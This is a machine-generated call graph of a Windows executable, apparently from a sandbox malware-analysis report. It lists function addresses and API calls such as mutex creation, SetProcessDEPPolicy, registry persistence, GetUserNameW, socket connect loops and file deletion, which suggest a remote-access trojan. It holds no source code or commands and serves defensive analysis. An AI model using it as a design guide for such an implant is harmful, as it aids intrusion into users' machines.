49195 419fb4 103 API calls 2 library calls 47545->49195 47548 40f126 47546->47548 47549 40f162 47547->47549 47550 401e65 22 API calls 47548->47550 47552 40f1cc 47549->47552 47553 40f16e 47549->47553 47551 40f138 47550->47551 47556 40f13f CreateThread 47551->47556 47554 401e65 22 API calls 47552->47554 47555 401e65 22 API calls 47553->47555 47557 40f1d5 47554->47557 47558 40f17e 47555->47558 47556->47543 49194 419fb4 103 API calls 2 library calls 47556->49194 47559 40f1e1 47557->47559 47560 40f21a 47557->47560 47561 401e65 22 API calls 47558->47561 47563 401e65 22 API calls 47559->47563 48057 41b60d 47560->48057 47564 40f193 47561->47564 47566 40f1ea 47563->47566 48268 40d9e8 31 API calls 47564->48268 47571 401e65 22 API calls 47566->47571 47567 401f13 28 API calls 47568 40f22e 47567->47568 47570 401f09 11 API calls 47568->47570 47573 40f237 47570->47573 47574 40f1ff 47571->47574 47572 40f1a6 47575 401f13 28 API calls 47572->47575 47576 40f240 SetProcessDEPPolicy 47573->47576 47577 40f243 CreateThread 47573->47577 47584 43baac _strftime 40 API calls 47574->47584 47578 40f1b2 47575->47578 47576->47577 47579 40f264 47577->47579 47580 40f258 CreateThread 47577->47580 49166 40f7a7 47577->49166 47581 401f09 11 API calls 47578->47581 47582 40f279 47579->47582 47583 40f26d CreateThread 47579->47583 47580->47579 49196 4120f7 138 API calls 47580->49196 47585 40f1bb CreateThread 47581->47585 47587 40f2cc 47582->47587 47589 402093 28 API calls 47582->47589 47583->47582 49198 4126db 38 API calls ___scrt_fastfail 47583->49198 47586 40f20c 47584->47586 47585->47552 49193 401be9 50 API calls _strftime 47585->49193 48269 40c162 7 API calls 47586->48269 48069 4134ff RegOpenKeyExA 47587->48069 47590 40f29c 47589->47590 48270 4052fd 28 API calls 47590->48270 47596 40f2ed 47597 41bc5e 28 API calls 47596->47597 47599 40f2fd 47597->47599 48271 41361b 31 API calls 47599->48271 47604 40f313 47605 401f09 11 API calls 47604->47605 47608 40f31e 47605->47608 47606 40f346 DeleteFileW 47607 40f34d 47606->47607 47606->47608 47607->47415 47608->47415 47608->47606 47609 40f334 Sleep 47608->47609 47609->47608 47610->47280 47611->47287 47612->47297 47613->47298 47614->47300 47615->47303 47616->47307 47618 438f36 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47617->47618 47630 43a43a 47618->47630 47622 438f4c 47623 438f57 47622->47623 47644 43a476 DeleteCriticalSection 47622->47644 47623->47309 47625 438f44 47625->47309 47672 44fb68 47626->47672 47629 438f5a 8 API calls 3 library calls 47629->47314 47631 43a443 47630->47631 47633 43a46c 47631->47633 47634 438f40 47631->47634 47645 438e7f 47631->47645 47650 43a476 DeleteCriticalSection 47633->47650 47634->47625 47636 43a3ec 47634->47636 47665 438d94 47636->47665 47638 43a3f6 47639 43a401 47638->47639 47670 438e42 6 API calls try_get_function 47638->47670 47639->47622 47641 43a40f 47642 43a41c 47641->47642 47671 43a41f 6 API calls ___vcrt_FlsFree 47641->47671 47642->47622 47644->47625 47651 438c73 47645->47651 47648 438eb6 InitializeCriticalSectionAndSpinCount 47649 438ea2 47648->47649 47649->47631 47650->47634 47652 438ca3 47651->47652 47653 438ca7 47651->47653 47652->47653 47657 438cc7 47652->47657 47658 438d13 47652->47658 47653->47648 47653->47649 47655 438cd3 GetProcAddress 47656 438ce3 __crt_fast_encode_pointer 47655->47656 47656->47653 47657->47653 47657->47655 47659 438d30 47658->47659 47660 438d3b LoadLibraryExW 47658->47660 47659->47652 47661 438d57 GetLastError 47660->47661 47662 438d6f 47660->47662 47661->47662 47663 438d62 LoadLibraryExW 47661->47663 47662->47659 47664 438d86 FreeLibrary 47662->47664 47663->47662 47664->47659 47666 438c73 try_get_function 5 API calls 47665->47666 47667 438dae 47666->47667 47668 438dc6 TlsAlloc 47667->47668 47669 438db7 47667->47669 47669->47638 47670->47641 47671->47639 47675 44fb81 47672->47675 47673 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47674 4345bd 47673->47674 47674->47312 47674->47629 47675->47673 47677 434b27 GetStartupInfoW 47676->47677 47677->47326 47679 44f06b 47678->47679 47680 44f062 47678->47680 47679->47330 47683 44ef58 47680->47683 47682->47330 47703 448215 GetLastError 47683->47703 47685 44ef65 47724 44f077 47685->47724 47687 44ef6d 47733 44ecec 47687->47733 47692 44efc7 47758 446782 20 API calls _free 47692->47758 47696 44ef84 47696->47679 47697 44efc2 47757 4405dd 20 API calls _Atexit 47697->47757 47699 44f00b 47699->47692 47760 44ebc2 20 API calls 47699->47760 47700 44efdf 47700->47699 47759 446782 20 API calls _free 47700->47759 47704 448237 47703->47704 47705 44822b 47703->47705 47762 445af3 20 API calls 3 library calls 47704->47762 47761 4487bc 11 API calls 2 library calls 47705->47761 47708 448231 47708->47704 47710 448280 SetLastError 47708->47710 47709 448243 47715 44824b 47709->47715 47764 448812 11 API calls 2 library calls 47709->47764 47710->47685 47713 448260 47713->47715 47716 448267 47713->47716 47714 448251 47718 44828c SetLastError 47714->47718 47763 446782 20 API calls _free 47715->47763 47765 448087 20 API calls _Atexit 47716->47765 47767 4460f4 36 API calls 4 library calls 47718->47767 47719 448272 47766 446782 20 API calls _free 47719->47766 47722 448298 47723 448279 47723->47710 47723->47718 47725 44f083 ___DestructExceptionObject 47724->47725 47726 448215 _Atexit 36 API calls 47725->47726 47731 44f08d 47726->47731 47728 44f111 ___DestructExceptionObject 47728->47687 47731->47728 47768 4460f4 36 API calls 4 library calls 47731->47768 47769 445888 EnterCriticalSection 47731->47769 47770 446782 20 API calls _free 47731->47770 47771 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47731->47771 47772 43a7b7 47733->47772 47736 44ed0d GetOEMCP 47738 44ed36 47736->47738 47737 44ed1f 47737->47738 47739 44ed24 GetACP 47737->47739 47738->47696 47740 446137 47738->47740 47739->47738 47741 446175 47740->47741 47745 446145 ___crtLCMapStringA 47740->47745 47783 4405dd 20 API calls _Atexit 47741->47783 47742 446160 RtlAllocateHeap 47744 446173 47742->47744 47742->47745 47744->47692 47747 44f119 47744->47747 47745->47741 47745->47742 47782 442f80 7 API calls 2 library calls 47745->47782 47748 44ecec 38 API calls 47747->47748 47749 44f138 47748->47749 47752 44f189 IsValidCodePage 47749->47752 47754 44f13f 47749->47754 47756 44f1ae ___scrt_fastfail 47749->47756 47750 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47751 44efba 47750->47751 47751->47697 47751->47700 47753 44f19b GetCPInfo 47752->47753 47752->47754 47753->47754 47753->47756 47754->47750 47784 44edc4 GetCPInfo 47756->47784 47757->47692 47758->47696 47759->47699 47760->47692 47761->47708 47762->47709 47763->47714 47764->47713 47765->47719 47766->47723 47767->47722 47768->47731 47769->47731 47770->47731 47771->47731 47773 43a7ca 47772->47773 47774 43a7d4 47772->47774 47773->47736 47773->47737 47774->47773 47775 448215 _Atexit 36 API calls 47774->47775 47776 43a7f5 47775->47776 47780 448364 36 API calls __Tolower 47776->47780 47778 43a80e 47781 448391 36 API calls _strftime 47778->47781 47780->47778 47781->47773 47782->47745 47783->47744 47790 44edfe 47784->47790 47793 44eea8 47784->47793 47787 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47789 44ef54 47787->47789 47789->47754 47794 45112c 47790->47794 47792 44ae66 _swprintf 41 API calls 47792->47793 47793->47787 47795 43a7b7 _strftime 36 API calls 47794->47795 47796 45114c MultiByteToWideChar 47795->47796 47798 451222 47796->47798 47799 45118a 47796->47799 47800 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47798->47800 47802 446137 ___crtLCMapStringA 21 API calls 47799->47802 47804 4511ab __alloca_probe_16 ___scrt_fastfail 47799->47804 47803 44ee5f 47800->47803 47801 45121c 47813 435e40 20 API calls _free 47801->47813 47802->47804 47808 44ae66 47803->47808 47804->47801 47806 4511f0 MultiByteToWideChar 47804->47806 47806->47801 47807 45120c GetStringTypeW 47806->47807 47807->47801 47809 43a7b7 _strftime 36 API calls 47808->47809 47810 44ae79 47809->47810 47814 44ac49 47810->47814 47813->47798 47815 44ac64 ___crtLCMapStringA 47814->47815 47816 44ac8a MultiByteToWideChar 47815->47816 47817 44acb4 47816->47817 47818 44ae3e 47816->47818 47821 446137 ___crtLCMapStringA 21 API calls 47817->47821 47824 44acd5 __alloca_probe_16 47817->47824 47819 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47818->47819 47820 44ae51 47819->47820 47820->47792 47821->47824 47822 44ad8a 47850 435e40 20 API calls _free 47822->47850 47823 44ad1e MultiByteToWideChar 47823->47822 47825 44ad37 47823->47825 47824->47822 47824->47823 47841 448bb3 47825->47841 47829 44ad61 47829->47822 47833 448bb3 _strftime 11 API calls 47829->47833 47830 44ad99 47831 446137 ___crtLCMapStringA 21 API calls 47830->47831 47835 44adba __alloca_probe_16 47830->47835 47831->47835 47832 44ae2f 47849 435e40 20 API calls _free 47832->47849 47833->47822 47835->47832 47836 448bb3 _strftime 11 API calls 47835->47836 47837 44ae0e 47836->47837 47837->47832 47838 44ae1d WideCharToMultiByte 47837->47838 47838->47832 47839 44ae5d 47838->47839 47851 435e40 20 API calls _free 47839->47851 47842 4484ca _Atexit 5 API calls 47841->47842 47843 448bda 47842->47843 47846 448be3 47843->47846 47852 448c3b 10 API calls 3 library calls 47843->47852 47845 448c23 LCMapStringW 47845->47846 47847 434fcb __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47846->47847 47848 448c35 47847->47848 47848->47822 47848->47829 47848->47830 47849->47822 47850->47818 47851->47822 47852->47845 47854 41cb8f LoadLibraryA GetProcAddress 47853->47854 47855 41cb7f GetModuleHandleA GetProcAddress 47853->47855 47856 41cbb8 44 API calls 47854->47856 47857 41cba8 LoadLibraryA GetProcAddress 47854->47857 47855->47854 47856->47334 47857->47856 48274 41b4a8 FindResourceA 47858->48274 47862 40f3ed _Yarn 48284 4020b7 47862->48284 47865 401fe2 28 API calls 47866 40f413 47865->47866 47867 401fd8 11 API calls 47866->47867 47868 40f41c 47867->47868 47869 43bd51 new 21 API calls 47868->47869 47870 40f42d _Yarn 47869->47870 48290 406dd8 47870->48290 47872 40f460 47872->47336 47874 40210c 47873->47874 47875 4023ce 11 API calls 47874->47875 47876 402126 47875->47876 47877 402569 28 API calls 47876->47877 47878 402134 47877->47878 47878->47339 48344 4020df 47879->48344 47881 401fd8 11 API calls 47882 41bed0 47881->47882 47883 401fd8 11 API calls 47882->47883 47885 41bed8 47883->47885 47884 41bea0 47886 4041a2 28 API calls 47884->47886 47888 401fd8 11 API calls 47885->47888 47889 41beac 47886->47889 47892 40ea24 47888->47892 47893 401fe2 28 API calls 47889->47893 47890 41be2e 47890->47884 47891 401fe2 28 API calls 47890->47891 47896 401fd8 11 API calls 47890->47896 47900 41be9e 47890->47900 48348 4041a2 47890->48348 48351 41ce34 28 API calls 47890->48351 47891->47890 47901 40fb17 47892->47901 47894 41beb5 47893->47894 47895 401fd8 11 API calls 47894->47895 47897 41bebd 47895->47897 47896->47890 48352 41ce34 28 API calls 47897->48352 47900->47881 47902 40fb23 47901->47902 47904 40fb2a 47901->47904 48359 402163 11 API calls 47902->48359 47904->47344 47906 402163 47905->47906 47907 40219f 47906->47907 48360 402730 11 API calls 47906->48360 47907->47346 47909 402184 48361 402712 11 API calls std::_Deallocate 47909->48361 47913 401e6d 47911->47913 47912 401e75 47912->47351 47913->47912 48362 402158 22 API calls 47913->48362 47917 4020df 11 API calls 47916->47917 47918 40532a 47917->47918 48363 4032a0 47918->48363 47920 405346 47920->47360 48367 4051ef 47921->48367 47923 406391 48371 402055 47923->48371 47926 401fe2 47927 401ff1 47926->47927 47928 402039 47926->47928 47929 4023ce 11 API calls 47927->47929 47935 401fd8 47928->47935 47930 401ffa 47929->47930 47931 40203c 47930->47931 47932 402015 47930->47932 47933 40267a 11 API calls 47931->47933 48403 403098 28 API calls 47932->48403 47933->47928 47936 4023ce 11 API calls 47935->47936 47937 401fe1 47936->47937 47937->47371 47939 401fd2 47938->47939 47940 401fc9 47938->47940 47939->47377 48404 4025e0 28 API calls 47940->48404 48405 401fab 47942->48405 47944 40d073 CreateMutexA GetLastError 47944->47393 48406 41bfb7 47945->48406 47950 401fe2 28 API calls 47951 41b2ff 47950->47951 47952 401fd8 11 API calls 47951->47952 47953 41b307 47952->47953 47954 4135a6 31 API calls 47953->47954 47956 41b35d 47953->47956 47955 41b330 47954->47955 47957 41b33b StrToIntA 47955->47957 47956->47399 47958 41b349 47957->47958 47961 41b352 47957->47961 48414 41cf69 22 API calls 47958->48414 47960 401fd8 11 API calls 47960->47956 47961->47960 47963 40772a 47962->47963 47964 413549 3 API calls 47963->47964 47965 407731 47964->47965 47965->47411 47965->47412 47967 41bc72 47966->47967 48415 40b904 47967->48415 47969 41bc7a 47969->47427 47971 401f22 47970->47971 47978 401f6a 47970->47978 47972 402252 11 API calls 47971->47972 47973 401f2b 47972->47973 47974 401f6d 47973->47974 47976 401f46 47973->47976 48448 402336 47974->48448 48447 40305c 28 API calls 47976->48447 47979 401f09 47978->47979 47980 402252 11 API calls 47979->47980 47981 401f12 47980->47981 47981->47439 47983 413965 47982->47983 47984 406dd8 28 API calls 47983->47984 47985 41397a 47984->47985 47986 4020f6 28 API calls 47985->47986 47987 41398a 47986->47987 47988 41376f 14 API calls 47987->47988 47989 413994 47988->47989 47990 401fd8 11 API calls 47989->47990 47991 4139a1 47990->47991 47991->47487 47993 40209b 47992->47993 47994 4023ce 11 API calls 47993->47994 47995 4020a6 47994->47995 48452 4024ed 47995->48452 47999 4137bf 47998->47999 48000 413788 47998->48000 48001 401fd8 11 API calls 47999->48001 48003 41379a RegSetValueExA RegCloseKey 48000->48003 48002 40ef9e 48001->48002 48002->47490 48003->47999 48005 43bac5 _strftime 48004->48005 48456 43ae03 48005->48456 48007 40efb7 48007->47496 48007->47498 48009 41b5a0 48008->48009 48010 41b505 GetLocalTime 48008->48010 48012 401fd8 11 API calls 48009->48012 48011 40531e 28 API calls 48010->48011 48014 41b547 48011->48014 48013 41b5a8 48012->48013 48015 401fd8 11 API calls 48013->48015 48016 406383 28 API calls 48014->48016 48017 40f00d 48015->48017 48018 41b553 48016->48018 48017->47514 48483 402f10 48018->48483 48021 406383 28 API calls 48022 41b56b 48021->48022 48488 407200 77 API calls 48022->48488 48024 41b579 48025 401fd8 11 API calls 48024->48025 48026 41b585 48025->48026 48027 401fd8 11 API calls 48026->48027 48028 41b58e 48027->48028 48029 401fd8 11 API calls 48028->48029 48030 41b597 48029->48030 48031 401fd8 11 API calls 48030->48031 48031->48009 48033 409e02 _wcslen 48032->48033 48034 409e24 48033->48034 48035 409e0d 48033->48035 48037 40da34 31 API calls 48034->48037 48036 40da34 31 API calls 48035->48036 48038 409e15 48036->48038 48039 409e2c 48037->48039 48040 401f13 28 API calls 48038->48040 48041 401f13 28 API calls 48039->48041 48042 409e1f 48040->48042 48043 409e3a 48041->48043 48045 401f09 11 API calls 48042->48045 48044 401f09 11 API calls 48043->48044 48046 409e42 48044->48046 48047 409e79 48045->48047 48507 40915b 28 API calls 48046->48507 48492 40a109 48047->48492 48049 409e54 48508 403014 48049->48508 48054 401f13 28 API calls 48055 409e69 48054->48055 48056 401f09 11 API calls 48055->48056 48056->48042 48058 41b630 GetUserNameW 48057->48058 48712 40417e 48058->48712 48063 403014 28 API calls 48064 41b672 48063->48064 48065 401f09 11 API calls 48064->48065 48066 41b67b 48065->48066 48067 401f09 11 API calls 48066->48067 48068 40f223 48067->48068 48068->47567 48070 413520 RegQueryValueExA RegCloseKey 48069->48070 48071 40f2e4 48069->48071 48070->48071 48071->47440 48071->47596 48073 40f392 48072->48073 48074 413a3f RegDeleteValueW 48072->48074 48073->47434 48074->48073 48076 40dd5b 48075->48076 48077 4134ff 3 API calls 48076->48077 48078 40dd62 48077->48078 48082 40dd81 48078->48082 48806 401707 48078->48806 48080 40dd6f 48809 413877 RegCreateKeyA 48080->48809 48083 414f2a 48082->48083 48084 4020df 11 API calls 48083->48084 48085 414f3e 48084->48085 48829 41b8b3 48085->48829 48088 4020df 11 API calls 48089 414f54 48088->48089 48090 401e65 22 API calls 48089->48090 48091 414f62 48090->48091 48092 43baac _strftime 40 API calls 48091->48092 48093 414f6f 48092->48093 48094 414f81 48093->48094 48095 414f74 Sleep 48093->48095 48096 402093 28 API calls 48094->48096 48095->48094 48097 414f90 48096->48097 48098 401e65 22 API calls 48097->48098 48099 414f99 48098->48099 48100 4020f6 28 API calls 48099->48100 48101 414fa4 48100->48101 48102 41be1b 28 API calls 48101->48102 48103 414fac 48102->48103 48833 40489e WSAStartup 48103->48833 48105 414fb6 48106 401e65 22 API calls 48105->48106 48107 414fbf 48106->48107 48108 401e65 22 API calls 48107->48108 48157 41503e 48107->48157 48109 414fd8 48108->48109 48111 401e65 22 API calls 48109->48111 48110 4020f6 28 API calls 48110->48157 48112 414fe9 48111->48112 48114 401e65 22 API calls 48112->48114 48113 41be1b 28 API calls 48113->48157 48115 414ffa 48114->48115 48116 401e65 22 API calls 48115->48116 48118 41500b 48116->48118 48117 406c1e 28 API calls 48117->48157 48120 401e65 22 API calls 48118->48120 48119 401fe2 28 API calls 48119->48157 48121 41501c 48120->48121 48122 401e65 22 API calls 48121->48122 48123 41502e 48122->48123 48968 40473d 89 API calls 48123->48968 48125 401fd8 11 API calls 48125->48157 48126 401e65 22 API calls 48126->48157 48128 41518c WSAGetLastError 48969 41cae1 30 API calls 48128->48969 48132 402093 28 API calls 48134 41519c 48132->48134 48134->48132 48136 41b4ef 80 API calls 48134->48136 48139 401e8d 11 API calls 48134->48139 48140 401e65 22 API calls 48134->48140 48141 43baac _strftime 40 API calls 48134->48141 48134->48157 48177 415a71 CreateThread 48134->48177 48178 401fd8 11 API calls 48134->48178 48179 401f09 11 API calls 48134->48179 48970 4052fd 28 API calls 48134->48970 48972 40b051 85 API calls 48134->48972 48973 404e26 99 API calls 48134->48973 48136->48134 48138 40531e 28 API calls 48138->48157 48139->48134 48140->48134 48142 415acf Sleep 48141->48142 48142->48134 48143 406383 28 API calls 48143->48157 48144 402f10 28 API calls 48144->48157 48145 402093 28 API calls 48145->48157 48146 41b4ef 80 API calls 48146->48157 48149 40905c 28 API calls 48149->48157 48150 441e81 20 API calls 48150->48157 48151 4136f8 3 API calls 48151->48157 48152 4135a6 31 API calls 48152->48157 48153 40417e 28 API calls 48153->48157 48157->48110 48157->48113 48157->48117 48157->48119 48157->48125 48157->48126 48157->48128 48157->48134 48157->48138 48157->48143 48157->48144 48157->48145 48157->48146 48157->48149 48157->48150 48157->48151 48157->48152 48157->48153 48158 41bb8e 28 API calls 48157->48158 48159 401e65 22 API calls 48157->48159 48834 414ee9 48157->48834 48839 40482d 48157->48839 48846 404f51 48157->48846 48861 4048c8 connect 48157->48861 48921 41b7e0 48157->48921 48924 4145bd 48157->48924 48927 40dd89 48157->48927 48933 41bc42 48157->48933 48936 41bd1e 48157->48936 48158->48157 48160 415439 GetTickCount 48159->48160 48161 41bb8e 28 API calls 48160->48161 48174 415456 48161->48174 48163 41bb8e 28 API calls 48163->48174 48166 41bd1e 28 API calls 48166->48174 48168 406383 28 API calls 48168->48174 48169 402ea1 28 API calls 48169->48174 48170 402f10 28 API calls 48170->48174 48172 401fd8 11 API calls 48172->48174 48173 401f09 11 API calls 48173->48174 48174->48163 48174->48166 48174->48168 48174->48169 48174->48170 48174->48172 48174->48173 48940 41bae6 48174->48940 48942 41ba96 48174->48942 48947 40f8d1 29 API calls 48174->48947 48948 402f31 28 API calls 48174->48948 48949 404c10 48174->48949 48971 404aa1 61 API calls _Yarn 48174->48971 48177->48134 49156 41ad17 105 API calls 48177->49156 48178->48134 48179->48134 48180->47352 48181->47359 48182->47363 48185 4020df 11 API calls 48184->48185 48186 406c2a 48185->48186 48187 4032a0 28 API calls 48186->48187 48188 406c47 48187->48188 48188->47385 48190 413573 RegQueryValueExA RegCloseKey 48189->48190 48191 40eba4 48189->48191 48190->48191 48191->47382 48191->47400 48192->47388 48193->47418 48194->47412 48195->47402 48196->47416 48198 401f86 11 API calls 48197->48198 48199 40da50 48198->48199 48200 40da70 48199->48200 48201 40daa5 48199->48201 48216 40da66 48199->48216 49157 41b5b4 29 API calls 48200->49157 48203 41bfb7 GetCurrentProcess 48201->48203 48202 40db99 GetLongPathNameW 48205 40417e 28 API calls 48202->48205 48206 40daaa 48203->48206 48208 40dbae 48205->48208 48209 40db00 48206->48209 48210 40daae 48206->48210 48207 40da79 48211 401f13 28 API calls 48207->48211 48212 40417e 28 API calls 48208->48212 48213 40417e 28 API calls 48209->48213 48214 40417e 28 API calls 48210->48214 48215 40da83 48211->48215 48217 40dbbd 48212->48217 48218 40db0e 48213->48218 48219 40dabc 48214->48219 48220 401f09 11 API calls 48215->48220 48216->48202 49160 40ddd1 28 API calls 48217->49160 48224 40417e 28 API calls 48218->48224 48225 40417e 28 API calls 48219->48225 48220->48216 48222 40dbd0 49161 402fa5 28 API calls 48222->49161 48227 40db24 48224->48227 48228 40dad2 48225->48228 48226 40dbdb 49162 402fa5 28 API calls 48226->49162 49159 402fa5 28 API calls 48227->49159 49158 402fa5 28 API calls 48228->49158 48232 40dbe5 48236 401f09 11 API calls 48232->48236 48233 40db2f 48237 401f13 28 API calls 48233->48237 48234 40dadd 48235 401f13 28 API calls 48234->48235 48239 40dae8 48235->48239 48240 40dbef 48236->48240 48238 40db3a 48237->48238 48241 401f09 11 API calls 48238->48241 48242 401f09 11 API calls 48239->48242 48243 401f09 11 API calls 48240->48243 48245 40db43 48241->48245 48246 40daf1 48242->48246 48244 40dbf8 48243->48244 48247 401f09 11 API calls 48244->48247 48248 401f09 11 API calls 48245->48248 48249 401f09 11 API calls 48246->48249 48250 40dc01 48247->48250 48248->48215 48249->48215 48251 401f09 11 API calls 48250->48251 48252 40dc0a 48251->48252 48253 401f09 11 API calls 48252->48253 48254 40dc13 48253->48254 48254->47476 48255->47488 48256->47510 48258 41371e RegQueryValueExA RegCloseKey 48257->48258 48259 413742 48257->48259 48258->48259 48259->47466 48260->47502 48265 4344ef 48261->48265 48262 43bd51 new 21 API calls 48262->48265 48263 40f0d1 48263->47541 48265->48262 48265->48263 49163 442f80 7 API calls 2 library calls 48265->49163 49164 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48265->49164 49165 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 48265->49165 48268->47572 48269->47560 48271->47604 48272->47407 48275 41b4c5 LoadResource LockResource SizeofResource 48274->48275 48276 40f3de 48274->48276 48275->48276 48277 43bd51 48276->48277 48282 446137 ___crtLCMapStringA 48277->48282 48278 446175 48294 4405dd 20 API calls _Atexit 48278->48294 48279 446160 RtlAllocateHeap 48281 446173 48279->48281 48279->48282 48281->47862 48282->48278 48282->48279 48293 442f80 7 API calls 2 library calls 48282->48293 48285 4020bf 48284->48285 48295 4023ce 48285->48295 48287 4020ca 48299 40250a 48287->48299 48289 4020d9 48289->47865 48291 4020b7 28 API calls 48290->48291 48292 406dec 48291->48292 48292->47872 48293->48282 48294->48281 48296 4023d8 48295->48296 48297 402428 48295->48297 48296->48297 48306 4027a7 11 API calls std::_Deallocate 48296->48306 48297->48287 48300 40251a 48299->48300 48301 402520 48300->48301 48302 402535 48300->48302 48307 402569 48301->48307 48317 4028e8 48302->48317 48305 402533 48305->48289 48306->48297 48328 402888 48307->48328 48309 40257d 48310 402592 48309->48310 48311 4025a7 48309->48311 48333 402a34 22 API calls 48310->48333 48313 4028e8 28 API calls 48311->48313 48316 4025a5 48313->48316 48314 40259b 48334 4029da 22 API calls 48314->48334 48316->48305 48318 4028f1 48317->48318 48319 402953 48318->48319 48320 4028fb 48318->48320 48342 4028a4 22 API calls 48319->48342 48323 402904 48320->48323 48324 402917 48320->48324 48336 402cae 48323->48336 48326 402915 48324->48326 48327 4023ce 11 API calls 48324->48327 48326->48305 48327->48326 48329 402890 48328->48329 48330 402898 48329->48330 48335 402ca3 22 API calls 48329->48335 48330->48309 48333->48314 48334->48316 48337 402cb8 __EH_prolog 48336->48337 48343 402e54 22 API calls 48337->48343 48339 4023ce 11 API calls 48341 402d92 48339->48341 48340 402d24 48340->48339 48341->48326 48343->48340 48345 4020e7 48344->48345 48346 4023ce 11 API calls 48345->48346 48347 4020f2 48346->48347 48347->47890 48353 40423a 48348->48353 48351->47890 48352->47900 48354 404243 48353->48354 48355 4023ce 11 API calls 48354->48355 48356 40424e 48355->48356 48357 402569 28 API calls 48356->48357 48358 4041b5 48357->48358 48358->47890 48359->47904 48360->47909 48361->47907 48365 4032aa 48363->48365 48364 4032c9 48364->47920 48365->48364 48366 4028e8 28 API calls 48365->48366 48366->48364 48368 4051fb 48367->48368 48377 405274 48368->48377 48370 405208 48370->47923 48372 402061 48371->48372 48373 4023ce 11 API calls 48372->48373 48374 40207b 48373->48374 48399 40267a 48374->48399 48378 405282 48377->48378 48379 405288 48378->48379 48380 40529e 48378->48380 48388 4025f0 48379->48388 48382 4052f5 48380->48382 48383 4052b6 48380->48383 48397 4028a4 22 API calls 48382->48397 48386 4028e8 28 API calls 48383->48386 48387 40529c 48383->48387 48386->48387 48387->48370 48389 402888 22 API calls 48388->48389 48390 402602 48389->48390 48391 402672 48390->48391 48393 402629 48390->48393 48398 4028a4 22 API calls 48391->48398 48395 4028e8 28 API calls 48393->48395 48396 40263b 48393->48396 48395->48396 48396->48387 48400 40268b 48399->48400 48401 4023ce 11 API calls 48400->48401 48402 40208d 48401->48402 48402->47926 48403->47928 48404->47939 48407 41bfc4 GetCurrentProcess 48406->48407 48408 41b2d1 48406->48408 48407->48408 48409 4135a6 RegOpenKeyExA 48408->48409 48410 4135d4 RegQueryValueExA RegCloseKey 48409->48410 48411 4135fe 48409->48411 48410->48411 48412 402093 28 API calls 48411->48412 48413 413613 48412->48413 48413->47950 48414->47961 48416 40b90c 48415->48416 48421 402252 48416->48421 48418 40b917 48425 40b92c 48418->48425 48420 40b926 48420->47969 48422 40225c 48421->48422 48423 4022ac 48421->48423 48422->48423 48432 402779 11 API calls std::_Deallocate 48422->48432 48423->48418 48426 40b966 48425->48426 48427 40b938 48425->48427 48444 4028a4 22 API calls 48426->48444 48433 4027e6 48427->48433 48431 40b942 48431->48420 48432->48423 48434 4027ef 48433->48434 48435 402851 48434->48435 48436 4027f9 48434->48436 48446 4028a4 22 API calls 48435->48446 48439 402802 48436->48439 48440 402815 48436->48440 48445 402aea 28 API calls __EH_prolog 48439->48445 48442 402813 48440->48442 48443 402252 11 API calls 48440->48443 48442->48431 48443->48442 48445->48442 48447->47978 48449 402347 48448->48449 48450 402252 11 API calls 48449->48450 48451 4023c7 48450->48451 48451->47978 48453 4024f9 48452->48453 48454 40250a 28 API calls 48453->48454 48455 4020b1 48454->48455 48455->47482 48472 43ba0a 48456->48472 48458 43ae50 48459 43a7b7 _strftime 36 API calls 48458->48459 48464 43ae5c 48459->48464 48460 43ae15 48460->48458 48461 43ae2a 48460->48461 48471 43ae2f _Atexit 48460->48471 48477 4405dd 20 API calls _Atexit 48461->48477 48465 43ae8b 48464->48465 48478 43ba4f 40 API calls __Tolower 48464->48478 48468 43aef7 48465->48468 48479 43b9b6 20 API calls 2 library calls 48465->48479 48480 43b9b6 20 API calls 2 library calls 48468->48480 48469 43afbe _strftime 48469->48471 48481 4405dd 20 API calls _Atexit 48469->48481 48471->48007 48473 43ba22 48472->48473 48474 43ba0f 48472->48474 48473->48460 48482 4405dd 20 API calls _Atexit 48474->48482 48476 43ba14 _Atexit 48476->48460 48477->48471 48478->48464 48479->48468 48480->48469 48481->48471 48482->48476 48489 401fb0 48483->48489 48485 402f1e 48486 402055 11 API calls 48485->48486 48487 402f2d 48486->48487 48487->48021 48488->48024 48490 4025f0 28 API calls 48489->48490 48491 401fbd 48490->48491 48491->48485 48493 40a127 48492->48493 48494 413549 3 API calls 48493->48494 48495 40a12e 48494->48495 48496 40a142 48495->48496 48497 40a15c 48495->48497 48498 409e9b 48496->48498 48499 40a147 48496->48499 48513 40905c 48497->48513 48498->47533 48501 40905c 28 API calls 48499->48501 48503 40a155 48501->48503 48541 40a22d 29 API calls 48503->48541 48506 40a15a 48506->48498 48507->48049 48689 403222 48508->48689 48510 403022 48693 403262 48510->48693 48514 409072 48513->48514 48515 402252 11 API calls 48514->48515 48516 40908c 48515->48516 48542 404267 48516->48542 48518 40909a 48519 40a179 48518->48519 48554 40b8ec 48519->48554 48522 40a1a2 48525 402093 28 API calls 48522->48525 48523 40a1ca 48524 402093 28 API calls 48523->48524 48527 40a1d5 48524->48527 48526 40a1ac 48525->48526 48528 41bc5e 28 API calls 48526->48528 48529 402093 28 API calls 48527->48529 48530 40a1ba 48528->48530 48531 40a1e4 48529->48531 48558 40b164 31 API calls new 48530->48558 48533 41b4ef 80 API calls 48531->48533 48535 40a1e9 CreateThread 48533->48535 48534 40a1c1 48536 401fd8 11 API calls 48534->48536 48537 40a210 CreateThread 48535->48537 48538 40a204 CreateThread 48535->48538 48566 40a27d 48535->48566 48536->48523 48539 401f09 11 API calls 48537->48539 48563 40a289 48537->48563 48538->48537 48560 40a267 48538->48560 48540 40a224 48539->48540 48540->48498 48541->48506 48688 40a273 163 API calls 48541->48688 48543 402888 22 API calls 48542->48543 48544 40427b 48543->48544 48545 404290 48544->48545 48546 4042a5 48544->48546 48552 4042df 22 API calls 48545->48552 48547 4027e6 28 API calls 48546->48547 48549 4042a3 48547->48549 48549->48518 48550 404299 48553 402c48 22 API calls 48550->48553 48552->48550 48553->48549 48555 40b8f5 48554->48555 48556 40a197 